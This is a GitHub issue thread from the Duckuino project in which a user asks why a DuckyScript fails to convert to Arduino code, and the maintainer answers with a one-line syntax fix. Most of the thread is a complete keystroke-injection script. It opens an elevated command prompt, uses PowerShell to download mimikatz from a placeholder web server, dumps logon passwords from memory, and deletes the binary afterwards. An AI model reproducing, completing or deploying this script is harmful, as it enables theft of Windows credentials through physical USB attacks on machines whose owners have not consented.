Dukweeno/Duckuino #72: ctrl - shift enter ??

Virtuoso8, 2018-07-06:
Hi there, I tried converting a duckyscript to an arduino code but says line 7 has a problem?

__Input code:__
REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
**CTRL-SHIFT ENTER**
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe')
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER

__Output code:__
An error occured, the compiler returned undefined content !

__Error:__
Unknown command or key CTRL-SHIT at line: 7.

Cheers in advance

Nurrl, 2018-07-06:
Hello, from the DuckyScript documentation, the key words are `CONTROL SHIFT` instead of `CONTROL-SHIFT`.
So yeah, that's a problem on line 7 ^^

closed 2018-07-06 by Nurrl

Virtuoso8, 2018-07-07:
Hahah cheers man i figured that 2 minutes after i posted it.